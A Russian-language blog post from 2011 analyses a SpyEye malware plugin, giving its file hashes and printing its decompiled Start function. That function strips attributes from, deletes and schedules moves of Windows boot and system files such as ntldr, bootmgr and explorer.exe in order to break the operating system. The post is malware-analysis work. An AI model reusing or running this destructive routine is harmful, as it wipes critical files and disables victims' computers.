суббота, 17 сентября 2011 г.

Часть 2: SpyEye и plugin.dll




Наверняка разработка этого плагина велась под лозунгом: "Не наврежу, но нагажу" =) Особо тут смотреть не на что, но да все равно








MD5: 20f73f9765e592960f3f373788560ce4
SHA1: bf4e2c0f858210f3a4fcd74034bf87d1fefb915a
SHA256: ee8afff4b7d8cb851fc893c1913bfe56b89c11864be6faad561ae7947cf7bff6
signed int __cdecl Start()
{
  unsigned int index; // edi@1
  const CHAR *fName; // esi@2
  LPCSTR filesTable; // [sp+8h] [bp-18h]@1
  int v4; // [sp+Ch] [bp-14h]@1
  int v5; // [sp+10h] [bp-10h]@1
  int v6; // [sp+14h] [bp-Ch]@1
  int v7; // [sp+18h] [bp-8h]@1
  int v8; // [sp+1Ch] [bp-4h]@1

  filesTable = "c:\\ntldr";
  v4 = (int)"c:\\ntdetect.com";
  v5 = (int)"c:\\bootmgr";
  v6 = (int)"c:\\loadmgr";
  v7 = (int)"c:\\windows\\explorer.exe";
  v8 = (int)"c:\\osloader.exe";
  index = 0;
  do
  {
    fName = (&filesTable)[4 * index];
    SetFileAttributesA((&filesTable)[4 * index], FILE_ATTRIBUTE_NORMAL);
    DeleteFileA(fName);
    MoveFileExA(fName, "c:\\boots", 4u);
    ++index;
  }
  while ( index < 6 );
  return 1;
}

Плагин тупо пытается уничтожить файло чтобы нарушить нормальную работу OS

Комментариев нет:

Отправить комментарий